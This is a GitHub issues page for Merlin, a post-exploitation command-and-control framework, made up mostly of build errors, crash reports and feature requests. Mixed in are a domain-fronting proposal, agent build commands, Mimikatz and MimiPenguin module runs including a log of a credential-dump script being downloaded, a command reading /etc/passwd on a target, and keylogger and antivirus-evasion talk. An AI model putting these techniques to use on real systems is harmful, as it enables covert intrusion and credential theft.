ne0nd0g / merlin Goto Github PK
View Code? Open in Web Editor NEWMerlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.
License: GNU General Public License v3.0
Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.
License: GNU General Public License v3.0
To support domain fronting the only thing needed is the ability to add a host header to the http requests.
being able to do something like:
./merlinagent -u https://images.amazon.com -p 443 -front 1234123412341234.cloudfront.net
could add the header:
Host: 1234123412341234.cloudfront.net
to the request, and the connection would be fronted through images.amazon.com.
Just a note to let you know that the "dmg" releases and builds from source for Darwin are actually Mach-O executables. Unless this was purposeful obfuscation for some reason, in which case... carry on.
$ file /.../merlinAgent-Darwin-x64-v0.6.0/merlinAgent-Darwin-x64.dmg
/.../merlinAgent-Darwin-x64-v0.6.0/merlinAgent-Darwin-x64.dmg: Mach-O 64-bit executable x86_64
No complaints from AntiVirus definitions engine
Hacktool.Mimikatz detected in the Invoke-Merlin.ps1 script
Bit hard, we have a custom Symantec AV engine.
Would be awesome if we could use dynamic dns to not worry with all ip-changes...
it seems that agent ID is similar to UUID.If agent program restarts and reconnects server, the agent will send another ID to the server which is different than before, and the server will store two agent id from the same agent. this situation always happens on some Windows PCs. Consider using some time-invariant ID, like agent macaddr?
v0.7.0.BETA
1b0ce52d71da62da21cc8f90b97191308e6fe7a9
Setting agent to all
in a module would not generate an error when executing a module
Setting agent to all
and executing the module generates an error
Merlin[module][shellcodeInjection]» set Agent all
[+]agent set to ffffffff-ffff-ffff-ffff-ffffffffffff
Merlin[module][shellcodeInjection]» run
[!]ffffffff-ffff-ffff-ffff-ffffffffffff is not a valid agent
ffffffff-ffff-ffff-ffff-ffffffffffff
is meant to be a broadcast identifier. Merlin should cycle through all available agents and create a job. There were no agents checked in when this error was generated. The error message should state that no agents were found, not that the broadcast identifier is invalid.
Running the command cmd.exe /c dir C:\\Windows\\System32
will list the directory contents
The directory contents are returned. However the agent dies after the results are returned.
shell cmd.exe /c dir C:\\Windows\\System32
Agent was running on a Windows 10 operating system. Agent sleep time was set to 10s. Wonder if the amount of data being returned is causing the problem?
Hello,
Thank you for your efforts in creating this nice project.
I have run into the following issue:
When running or compiling agent
cmd/merlinagent/main.go:154: cannot use hostUUID (type "github.com/satori/go.uuid".UUID) as type "github.com/ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID in field value
cmd/merlinagent/main.go:200: cannot use hostUUID (type "github.com/satori/go.uuid".UUID) as type "github.com/ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID in field value
cmd/merlinagent/main.go:461: cannot use hostUUID (type "github.com/satori/go.uuid".UUID) as type "github.com/ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID in field value
Makefile:51: recipe for target 'agent-linux' failed
make: *** [agent-linux] Error 2
Server
cmd/merlinserver/main.go:176:10: cannot use j.ID (type "github.com/ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:180:11: cannot use j.ID (type "github.com/ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:186:11: cannot use j.ID (type "github.com/ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:312:8: cannot use j.ID (type "github.com/ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:312:26: cannot use j.ID (type "github.com/ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in field value
cmd/merlinserver/main.go:317:8: cannot use j.ID (type "github.com/ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:318:8: cannot use j.ID (type "github.com/ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:319:8: cannot use j.ID (type "github.com/ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:320:8: cannot use j.ID (type "github.com/ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:321:8: cannot use j.ID (type "github.com/ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:321:8: too many errors
Makefile:47: recipe for target 'server-linux' failed
make: *** [server-linux] Error 2
Running it via script
go run cmd/merlinserver/main.go
cmd/merlinserver/main.go:176:10: cannot use j.ID (type "github.com/ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:180:11: cannot use j.ID (type "github.com/ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:186:11: cannot use j.ID (type "github.com/ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:312:8: cannot use j.ID (type "github.com/ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:312:26: cannot use j.ID (type "github.com/ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in field value
cmd/merlinserver/main.go:317:8: cannot use j.ID (type "github.com/ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:318:8: cannot use j.ID (type "github.com/ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:319:8: cannot use j.ID (type "github.com/ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:320:8: cannot use j.ID (type "github.com/ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:321:8: cannot use j.ID (type "github.com/ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:321:8: too many errors
Add a system
command to Merlin server to explicitly execute commands on the host operating system. Merlin's current default is to execute any non-Merlin command on the host OS. However, some commands are both a valid Merlin command and host OS command such as ls
.
Case of option name should match the one we are using to set it.
Option names in "show options" output starting from uppercase, but option itself is in lowercase. This is confusing.
main.go:31:2: cannot find package "github.com/Ne0nd0g/merlin/pkg" in any of:
C:\Go\src\github.com\Ne0nd0g\merlin\pkg (from $GOROOT)
C:\Users\cyber_windows\go\src\github.com\Ne0nd0g\merlin\pkg (from $GOPATH)
main.go:32:2: cannot find package "github.com/Ne0nd0g/merlin/pkg/agent" in any of:
C:\Go\src\github.com\Ne0nd0g\merlin\pkg\agent (from $GOROOT)
C:\Users\cyber_windows\go\src\github.com\Ne0nd0g\merlin\pkg\agent (from $GOPATH)
main.go:28:2: cannot find package "github.com/fatih/color" in any of:
C:\Go\src\github.com\fatih\color (from $GOROOT)
C:\Users\cyber_windows\go\src\github.com\fatih\color (from $GOPATH)
same error for linux and env path is set
transparent proxy support on windows
no proxy support unless explicitly set by using http_proxy variable
set up a proxy and configure the windows machine to use it and try to launch merlin agent
Should be enough to reproduce
The module runs successfully
The application panics and crashes
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x80 pc=0x7408d1]
goroutine 6 [running]:
github.com/Ne0nd0g/merlin/pkg/agents.AddJob(0xffffffffffffffff, 0xffffffffffffffff, 0x84f84d, 0x3, 0xc4201d6460, 0x7, 0xa, 0x0, 0x0, 0x0, ...)
/mnt/c/Data/Dev/Go/src/github.com/Ne0nd0g/merlin/pkg/agents/agents.go:366 +0x511
github.com/Ne0nd0g/merlin/pkg/cli.Shell()
/mnt/c/Data/Dev/Go/src/github.com/Ne0nd0g/merlin/pkg/cli/cli.go:169 +0x2403
created by main.main
/mnt/c/Data/Dev/Go/src/github.com/Ne0nd0g/merlin/cmd/merlinserver/main.go:66 +0x472
go build -ldflags "-H=windowsgui -x main.url=https://myhost:443/" -o agent.exe cmd/merlinagent/main.go
use module windows/64/powershell/powersploit/Invoke-Mimikatz
; set agent all
; run
crashes the server.Also compiled with TDM-GCC as recommended. This did not fix the issue.
Success
Merlin[module][MimiPenguin]» [+]Results for job BqJhgpPTsU
[+]--2018-10-09 02:21:50-- https://raw.githubusercontent.com/huntergregal/mimipenguin/master/mimipenguin.sh
Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.120.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.120.133|:443... connected.
HTTP request sent, awaiting response... 404 Not Found
2018-10-09 02:21:50 ERROR 404: Not Found.
use the linux/x64/bash/credentials/MimiPenguin
module
Link to mimipenguin repo
When i use another port than 443 like 8443 for ssl, i don't get session. Even if i change port to 8443 in merlinserver config.
Any suggestion?
v.0.7.0.BETA
1b0ce52d71da62da21cc8f90b97191308e6fe7a9
Expected the shellcodeInjection
or execute-shellcode
module to parse a RAW file containing shellcode bytes.
Merlin[module][shellcodeInjection]» run
[!]there was an error parsing the shellcode file:
encoding/hex: invalid byte: U+0050 'P'
Merlin[agent][fabebecf-73b2-4463-9758-0d9e2ed0ab99]» execute-shellcode self /home/Desktop/Joe/calc.bin
[!]there was an error parsing the shellcode:
encoding/hex: invalid byte: U+002F '/'
Run either the execute-shellcode
function or shellcodeInjection
module pointing to a valid file
These are two different errors. The shellcodeInjection
error is because the module tries to parse the RAW file as hex instead of raw bytes. The execute-shellcode
error is because it is trying to parse the string as hex instead of checking to see if the input is a file first.
Been doing Go at Udemy because of this tool and its amazing that i always thought Go could be hard only to find it really sexy.
Am thinking of trying to make merlin a little modular, like screenshots, webcam, microphone etc.
Thankx Ne0
go build -ldflags "-H=windowsgui -X main.url=https://6.6.6.12:443/" -o merlinAgent.exe cmd/merlinagent/main.go
Get stable connection in the server
Merlin» [-]Received HTTP POST Connection from 6.6.6.46:443
[DEBUG]HTTP Connection Details:
[DEBUG]Host: 6.6.6.12:443
[DEBUG]URI: /
[DEBUG]Method: POST
[DEBUG]Protocol: HTTP/2.0
[DEBUG]Headers: map[Content-Length:[5957] Accept-Encoding:[gzip] User-Agent:[Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36] Content-Type:[application/octet-stream; charset=utf-8] Authorization:[Bearer eyJhbGciOiJkaXIiLCJjdHkiOiJKV1QiLCJlbmMiOiJBMjU2R0NNIiwidHlwIjoiSldUIn0..fQAgJ3IEDCLhT2lI.WT1eaaIoSk5veZ-bJRKr7bLUM4kd_jIkfKs9WUiaez_HIj34Nj38cO12zsCQsH8eHhdkRrWJrtjq8I24T59HvtObnpTWyY-idZMMsMbRBSA9Ub4ew2ljJyYv532KAqP60-Tkj1OK5XTPVuu6Rkzt-StycEArEwLNZPJm3XZpudDlcIUo0MMDtbWzsk1X-shc3HhYSwTw0eyVlk6VqxNv6EP9M0lPHyQsuIqWSfquNHPWZscWRtp09dhNyAg.SsI64DQ_KfTELnXCIUWMlw]]
[DEBUG]TLS Negotiated Protocol: h2
[DEBUG]TLS Cipher Suite: 49200
[DEBUG]TLS Server Name:
[DEBUG]Content Length: 5957
[DEBUG][DEBUG]POST DATA: {%!s(float32=0) 00000000-0000-0000-0000-000000000000 %!s(*json.RawMessage=&[]) }
[!]Invalid Activity:
Merlin»
Just run it...
Note that I used Linux for the server because the 0.8.0 server automatically shuts down after running on Windows 10 (tried in 2 different desktop, no vm).
I also tried the agent on MacOS and had the same issue (invalid activity).
Downgrading the agent to 0.7 fixed it but then some functionalities were not available.
Still going through code, but wondering should we rename some instances here or actual files, seems there is bug? i had to rename my code inside pkg/agent the func ExecuteCommand to EC in exec_windows
./merlinServer-Linux-x64
zsh: exec format error: ./merlinServer-Linux-x64
Merlin on connection showing victim information about host/user/platfrom
It is not showing it.
Create executable for windows and execute it on the victim with merlin-agent -url IP:PORT
Is there anything I can do to fix it ?
Agent doesn't crash
Agent crashes
Interrupt the response to the agent
Several locations either don't check error returns, or do, but then use a nil object, which leads to a panic due to a nil pointer dereference. offending lines I've found below:
Lines 541 to 542 in ca24c53
Lines 504 to 511 in ca24c53
Lines 702 to 711 in ca24c53
As a side note, there appears to be unchecked errors during some json decoding too. May be worth going over line-by-line and ensuring no errors are silently passed over.
I think that its not an issue of Merlin but an issue of gcc.
When I try to compile (gcc -shared -pthread -o merlin.dll merlin.c main.a -lwinmm -lntdll -lws2_32) both in windows and kali I get an error exit status and many undefined references.
Which version of gcc do you use? Have you done any special modifications?
Thanks
I like the minimal/tight nature of the framework, but not being able to create interactive shells is an impediment I'm having trouble working around effectively. Is there any plan/hope in the near future for adding interactive shell functionality? I assume it would have to be a feature of the agent and not implemented in a module?
Thank you for the hard work on the rest of the framework.
Can we have a docker merlin please.
Merlin version: 0.6.0 Master
Go Version: go version go1.10.4 linux/amd64
When I try to compile the DLL with make agent-dll I get this error:
make agent-dll
export GOOS=windows GOARCH=amd64 CC=x86_64-w64-mingw32-gcc CXX=x86_64-w64-mingw32-g++ CGO_ENABLED=1;
go build -buildmode=c-archive -o data/temp/v0.6.0/f04436131f2d88204765f905395f7d404103e360/main.a cmd/merlinagentdll/main.go;
cp data/bin/dll/merlin.c data/temp/v0.6.0/f04436131f2d88204765f905395f7d404103e360;
x86_64-w64-mingw32-gcc -shared -pthread -o data/temp/v0.6.0/f04436131f2d88204765f905395f7d404103e360/merlin.dll data/temp/v0.6.0/f04436131f2d88204765f905395f7d404103e360/merlin.c data/temp/v0.6.0/f04436131f2d88204765f905395f7d404103e360/main.a -lwinmm -lntdll -lws2_32
cmd/merlinagentdll/main.go:37: too many arguments in call to agent.New
have (string, bool, bool)
want (bool, bool)
cmd/merlinagentdll/main.go:38: not enough arguments in call to a.Run
have (string)
want (string, string)
x86_64-w64-mingw32-gcc: error: data/temp/v0.6.0/f04436131f2d88204765f905395f7d404103e360/main.a: No such file or directory
make: *** [Makefile:56: agent-dll] Error 1
When the merlinserver already running and victim open the link i have a problem on my merlin server (TLS Handshake Error : EOF). anyone can help me resolve this error ?
TLS handshake error from 192.168..**:: remote error: unknown certificate authority
TLS handshake error from 192.168..**:**: remote error: EOF
go run
go version go1.12.7 linux/amd64
$HOME/go
On new agent connect, a folder with its ID should be created (ex. data/agents/xxxx-xxxx-xxxx
) with the agent_log.txt
inside
A folder with the agent ID is created, but with incorrect permissions:
dzervas merlin> ls -la data/agents
drwxr-xr-x dzervas dzervas 4 KB Sat Jul 27 10:23:02 2019 ./
drwxr-xr-x dzervas dzervas 4 KB Fri Jul 26 17:31:52 2019 ../
d--------- dzervas dzervas 4 KB Sat Jul 27 10:21:31 2019 b4d72e27-2a68-4024-801d-b753e4fc71a0/
d--------- dzervas dzervas 4 KB Sat Jul 27 10:23:02 2019 d03f0107-4b4c-4602-acf3-10d26ec5f793/
d--------- dzervas dzervas 4 KB Fri Jul 26 18:17:36 2019 fda3db0e-ca68-4498-b61a-153965549dbd/
.rw-r--r-- dzervas dzervas 29 B Fri Jul 26 17:31:52 2019 README.MD
Start server and an agent
Sending commands to agent and recieve response (error message or otherwise)
Sending any module to agent produces the following error:
Merlin Server:
Merlin[module][LinEnum]» set agent all
[+]agent set to ffffffff-ffff-ffff-ffff-ffffffffffff
Merlin[module][LinEnum]» run
**panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x80 pc=0x725936]
goroutine 20 [running]:
github.com/Ne0nd0g/merlin/pkg/agents.AddJob(0xffffffffffffffff, 0xffffffffffffffff, 0x832567, 0x3, 0xc42029c0f0, 0xa, 0xf, 0x0, 0x0, 0x0, ...)
/root/go/src/github.com/Ne0nd0g/merlin/pkg/agents/agents.go:366 +0x506
github.com/Ne0nd0g/merlin/pkg/cli.Shell()
/root/go/src/github.com/Ne0nd0g/merlin/pkg/cli/cli.go:169 +0x21c6
created by main.main
/opt/merlin/cmd/merlinserver/main.go:66 +0x44e**
The above error also happens on Linux Mint with GO path = /home/user/go and go root = /usr/lib/go-1.10
Merlin Agent:
[-]Agent version: 0.6.0 Beta
[-]Agent build: nonRelease
[-]Connecting to web server at https://127.0.0.1:443 for initial check in.
[-]Sleeping for 30.271s at 2018-08-30 02:51:02.860022733 -0400 EDT m=+0.008732155
[-]Checking in
[-]Connecting to web server at https://127.0.0.1:443 for status check in.
[+]ServerOk Message Type Received!
Sending upload/download command produces the following error:
2018/08/30 02:59:29 http2: **panic serving 127.0.0.1:56328: runtime error: index out of range
goroutine 134 [running]:
net/http.(*http2serverConn).runHandler.func1(0xc42000e0d8, 0xc4202cdfaf, 0xc42034a380)
/usr/lib/go-1.10/src/net/http/h2_bundle.go:5753 +0x190
panic(0x7b26e0, 0xa94710)
/usr/lib/go-1.10/src/runtime/panic.go:502 +0x229
github.com/Ne0nd0g/merlin/pkg/agents.GetMessageForJob(0xfa4ee829dcfa8d68, 0x13fe7659137ecfac, 0xc4203f0580, 0xa, 0x832e4e, 0x6, 0x833146, 0x7, 0xc42031f350, 0x1, ...)
/root/go/src/github.com/Ne0nd0g/merlin/pkg/agents/agents.go:503 +0x1a62
github.com/Ne0nd0g/merlin/pkg/agents.StatusCheckIn(0xdcfa8d683f800000, 0x137ecfacfa4ee829, 0x13fe7659, 0xc42026a7e0, 0xd, 0x7b3920, 0xc42026c220, 0xc4204b0000, 0x1000, 0x0, ...)
/root/go/src/github.com/Ne0nd0g/merlin/pkg/agents/agents.go:208 +0x3b8
github.com/Ne0nd0g/merlin/pkg/servers/http2.agentHandler(0x8898a0, 0xc42000e0d8, 0xc42016e800)
/root/go/src/github.com/Ne0nd0g/merlin/pkg/servers/http2/http2.go:248 +0xcaf
net/http.HandlerFunc.ServeHTTP(0x852418, 0x8898a0, 0xc42000e0d8, 0xc42016e800)
/usr/lib/go-1.10/src/net/http/server.go:1947 +0x44
net/http.(*ServeMux).ServeHTTP(0xc4200a16b0, 0x8898a0, 0xc42000e0d8, 0xc42016e800)
/usr/lib/go-1.10/src/net/http/server.go:2337 +0x130
net/http.serverHandler.ServeHTTP(0xc4200a3c70, 0x8898a0, 0xc42000e0d8, 0xc42016e800)
/usr/lib/go-1.10/src/net/http/server.go:2694 +0xbc
net/http.initNPNRequest.ServeHTTP(0xc42017ca80, 0xc4200a3c70, 0x8898a0, 0xc42000e0d8, 0xc42016e800)
/usr/lib/go-1.10/src/net/http/server.go:3260 +0x9a
net/http.(Handler).ServeHTTP-fm(0x8898a0, 0xc42000e0d8, 0xc42016e800)
/usr/lib/go-1.10/src/net/http/h2_bundle.go:5475 +0x4d
net/http.(http2serverConn).runHandler(0xc42034a380, 0xc42000e0d8, 0xc42016e800, 0xc42031f500)
/usr/lib/go-1.10/src/net/http/h2_bundle.go:5760 +0x89
created by net/http.(http2serverConn).processHeaders
/usr/lib/go-1.10/src/net/http/h2_bundle.go:5494 +0x46b
Any task sent to agent crashes the server with one of the above messages. I have the same response with pre-compiled binaries with the default https://127.0.0.1:443 url.
I have tried to recreate the certs but it didn't help. Firewall is turned off and theres no competing listeners on other ports. I suspect it may be a go issue and not a merlin issue but if you have some insight it would be much appreciated.
sometimes we need run server with deamon mode,not attach it always.
when i run make agent-dll
i expected to get a .ddl in the output directory, but did not.
Compiling to pure golang binaries for all OS's works btw
cd /Users/apple/workspace/go/src/github.com/Ne0nd0g/merlin && make agent-dll
export GOOS=windows GOARCH=amd64 CC=x86_64-w64-mingw32-gcc CXX=x86_64-w64-mingw32-g++ CGO_ENABLED=1; \
go build -buildmode=c-archive -o data/temp/v0.6.4.BETA/eb92bab9980f5b5d728b8a7bf15e894554ff0206/main.a cmd/merlinagentdll/main.go; \
cp data/bin/dll/merlin.c data/temp/v0.6.4.BETA/eb92bab9980f5b5d728b8a7bf15e894554ff0206; \
x86_64-w64-mingw32-gcc -shared -pthread -o data/temp/v0.6.4.BETA/eb92bab9980f5b5d728b8a7bf15e894554ff0206/merlin.dll data/temp/v0.6.4.BETA/eb92bab9980f5b5d728b8a7bf15e894554ff0206/merlin.c data/temp/v0.6.4.BETA/eb92bab9980f5b5d728b8a7bf15e894554ff0206/main.a -lwinmm -lntdll -lws2_32
/usr/local/Cellar/mingw-w64/5.0.4_1/toolchain-x86_64/bin/x86_64-w64-mingw32-ld: /var/folders/wp/ff6sz9qs6g71jnm12nj2kbyw0000gp/T//cc4ILowZ.o:merlin.c:(.text+0xe): undefined reference to `Run'
collect2: error: ld returned 1 exit status
make[1]: *** [agent-dll] Error 1
make: *** [build-dll] Error 2
Run make agent-dll
x-MacBook-Pro:eb92bab9980f5b5d728b8a7bf15e894554ff0206 apple$ pwd
/Users/apple/workspace/go/src/github.com/Ne0nd0g/merlin/data/temp/v0.6.4.BETA/eb92bab9980f5b5d728b8a7bf15e894554ff0206
x-MacBook-Pro:eb92bab9980f5b5d728b8a7bf15e894554ff0206 apple$ ls -al
total 126872
drwxr-xr-x 11 apple staff 352 Jan 4 13:16 .
drwxr-xr-x 3 apple staff 96 Jan 4 13:13 ..
-rw-r--r-- 1 apple staff 17586928 Jan 4 13:16 main.a
-rw-r--r-- 1 apple staff 2702 Jan 4 13:16 main.h
-rw-r--r-- 1 apple staff 77 Jan 4 13:16 merlin.c
-rwxr-xr-x 1 apple staff 8089924 Jan 4 13:13 merlinAgent-Darwin-x64
-rwxr-xr-x 1 apple staff 7364608 Jan 4 13:13 merlinAgent-Linux-x64
-rwxr-xr-x 1 apple staff 7434240 Jan 4 13:13 merlinAgent-Windows-x64.exe
-rwxr-xr-x 1 apple staff 8664852 Jan 4 13:13 merlinServer-Darwin-x64
-rwxr-xr-x 1 apple staff 7898720 Jan 4 13:13 merlinServer-Linux-x64
-rwxr-xr-x 1 apple staff 7900672 Jan 4 13:13 merlinServer-Windows-x64.exe
I have a lot of golang code for agent features. I think these would best be implemented as modules. I was hoping you could make an example module so I could use it as a template for implementing more specialized agent features.
merlinagent/main.go var hostUUID = uuid.NewV4(), cant compile.
Using Goland as IDE
merlinserver/main.go
cmd/merlinserver/main.go:176:10: cannot use j.ID (type "github.com/Ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:180:11: cannot use j.ID (type "github.com/Ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:186:11: cannot use j.ID (type "github.com/Ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:312:8: cannot use j.ID (type "github.com/Ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:312:26: cannot use j.ID (type "github.com/Ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in field value
cmd/merlinserver/main.go:317:8: cannot use j.ID (type "github.com/Ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:318:8: cannot use j.ID (type "github.com/Ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:319:8: cannot use j.ID (type "github.com/Ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:320:8: cannot use j.ID (type "github.com/Ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:321:8: cannot use j.ID (type "github.com/Ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
nice evasion for antivirus, but need download or upload file on agent (victim) .. thanks ...
Expected to only see a single line response containing the grep output when running:
cmd cat /etc/passwd | grep root
Entire contents of /etc/passwd
were returned
Execute cmd cat /etc/passwd | grep root
from the server for a Linux agent
Agent debug information shows the command was received properly:
[DEBUG]Agent ID: ea3e4d2c-aae0-42e7-869b-2f0d826fb256
[DEBUG]Message Type: CmdPayload
[DEBUG]Message Payload: &{"executable":"cat","args":"/etc/passwd | grep root","job":"fyIdTQkQzH"}
[DEBUG]Received input parameter for executeCommand function: {cat /etc/passwd | grep root fyIdTQkQzH}
A Keylogger/Keystrokes is a nice feature! This script works fine, excepts when shift + char is pressed. Only '[Shift]' is logged... I don't know how to fix. And this one (don't tested).
Merlin agent uses a TLS configuration setting of InsecureSkipVerify: true
that will permit communications with a server using an untrusted certificate. Initially this was by design to facilitate ease of use and allow operators the ability to use self-signed certificates.
Merlin Agent should be written so that, by default, it won't communicate with hosts using an untrusted certificate. A command line flag and/or build argument should be implemented to downgrade security to allow communications with a host using an untrusted certificate.
Alternatively, have the agent report back the certificate hash it believes it is communicating with and check it against the server's hash, even if using a self-signed certificate. If there is no match drop the communication or hold the agent in a quarantine state and allow the operator to decide how to proceed.
v0.7.0.BETA
1.12
Linux
When starting the Merlin server with a QUIC listener by specifying -proto hq
, the Merlin Server would start and listen on port 443/UDP.
The Merlin Server just exists. The ListenAndServeTLS
function returns the no such file or directory
error. The source code was modified to retrieve this error. The error is in reference to the x509 certificate.
Start Merlin Server (i.e. ./merlinServer -proto hq
)
The error seems to surround generating a x509 in-memory only certificate. A valid work around is to generate a x509 key pair and save them in the data/x509
directory. This will prevent the listener from generating an error.
I'm trying to build the docker image from the git repo commit 2c1146f on Aug 20
I get an error about missing package quic-go/h2quic. I went to that github repo and it appears it has been renamed to http3.
sudo docker build -t merlin .
Password:
Sending build context to Docker daemon 34.51MB
Step 1/8 : FROM golang:stretch
---> 710c1c6c29c8
Step 2/8 : MAINTAINER @audibleblink
---> Using cache
---> d50866a17f1f
Step 3/8 : RUN apt-get update && apt-get install -y git make
---> Using cache
---> 34fef87fbca6
Step 4/8 : RUN go get github.com/Ne0nd0g/merlin/...
---> Running in 35c1eed65de2
package github.com/Ne0nd0g/merlin/cmd/merlinagent
imports github.com/lucas-clemente/quic-go/h2quic: cannot find package "github.com/lucas-clemente/quic-go/h2quic" in any of:
/usr/local/go/src/github.com/lucas-clemente/quic-go/h2quic (from $GOROOT)
/go/src/github.com/lucas-clemente/quic-go/h2quic (from $GOPATH)
The command '/bin/sh -c go get github.com/Ne0nd0g/merlin/...' returned a non-zero code: 1
I'm on Mac Darwin 18.7.0
when running the agent and typing "help" the screen output formatting is garbled. Not at all like in the wiki example. I think its because i am on darwin ?
Merlin» [-]Starting h2 listener on 127.0.0.1:443
x-MacBook-Pro:server apple$ GNU bash, version 3.2.57(1)-release (x86_64-apple-darwin18)
These shell commands are defined internally. Type `help' to see this list.
Type `help name' to find out more about the function `name'.
Use `info bash' to find out more about the shell in general.
Use `man -k' or `info' to find out more about commands not in this list.
A star (*) next to a name means that the command is disabled.
JOB_SPEC [&] (( expression ))
. filename [arguments] :
[ arg... ] [[ expression ]]
alias [-p] [name[=value] ... ] bg [job_spec ...]
bind [-lpvsPVS] [-m keymap] [-f fi break [n]
builtin [shell-builtin [arg ...]] caller [EXPR]
case WORD in [PATTERN [| PATTERN]. cd [-L|-P] [dir]
command [-pVv] command [arg ...] compgen [-abcdefgjksuv] [-o option
complete [-abcdefgjksuv] [-pr] [-o continue [n]
declare [-afFirtx] [-p] [name[=val dirs [-clpv] [+N] [-N]
disown [-h] [-ar] [jobspec ...] echo [-neE] [arg ...]
enable [-pnds] [-a] [-f filename] eval [arg ...]
exec [-cl] [-a name] file [redirec exit [n]
export [-nf] [name[=value] ...] or false
fc [-e ename] [-nlr] [first] [last fg [job_spec]
for NAME [in WORDS ... ;] do COMMA for (( exp1; exp2; exp3 )); do COM
function NAME { COMMANDS ; } or NA getopts optstring name [arg]
hash [-lr] [-p pathname] [-dt] [na help [-s] [pattern ...]
history [-c] [-d offset] [n] or hi if COMMANDS; then COMMANDS; [ elif
jobs [-lnprs] [jobspec ...] or job kill [-s sigspec | -n signum | -si
let arg [arg ...] local name[=value] ...
logout popd [+N | -N] [-n]
printf [-v var] format [arguments] pushd [dir | +N | -N] [-n]
pwd [-LP] read [-ers] [-u fd] [-t timeout] [
readonly [-af] [name[=value] ...] return [n]
select NAME [in WORDS ... ;] do CO set [--abefhkmnptuvxBCHP] [-o opti
shift [n] shopt [-pqsu] [-o long-option] opt
source filename [arguments] suspend [-f]
test [expr] time [-p] PIPELINE
times trap [-lp] [arg signal_spec ...]
true type [-afptP] name [name ...]
typeset [-afFirtx] [-p] name[=valu ulimit [-SHacdfilmnpqstuvx] [limit
umask [-p] [-S] [mode] unalias [-a] name [name ...]
unset [-f] [-v] [name ...] until COMMANDS; do COMMANDS; done
variables - Some variable names an wait [n]
while COMMANDS; do COMMANDS; done { COMMANDS ; }
Windows 10 updates have broken the Get-ProcAddress function that is relied on by the Powershell Mafia module.
They are not updating the version of Invoke-Mimikatz in use by Merlin (see PowerShellMafia/PowerSploit#293).
